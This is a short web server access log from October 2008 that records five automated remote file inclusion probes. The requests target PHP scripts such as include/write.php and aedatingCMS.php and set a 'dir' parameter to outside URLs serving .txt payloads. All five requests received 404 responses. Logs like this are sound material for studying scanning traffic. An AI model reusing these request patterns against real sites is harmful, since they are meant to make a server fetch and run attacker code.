63.247.65.114 - - [26/Oct/2008:09:12:02 -0700] "GET /inc/cmses/aedatingCMS.php?dir[inc]=http://www.silberpfeile.de/news/inc/image.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
208.83.106.201 - - [26/Oct/2008:09:12:02 -0700] "GET /logs//include/write.php?dir=http://www.gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:12:02 -0700] "GET /include/write.php?dir=http://www.gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:12:02 -0700] "GET /logs/access_080126.log//include/write.php?dir=http://www.gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:12:02 -0700] "GET /logs/access_080914.log//include/write.php?dir=http://www.gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
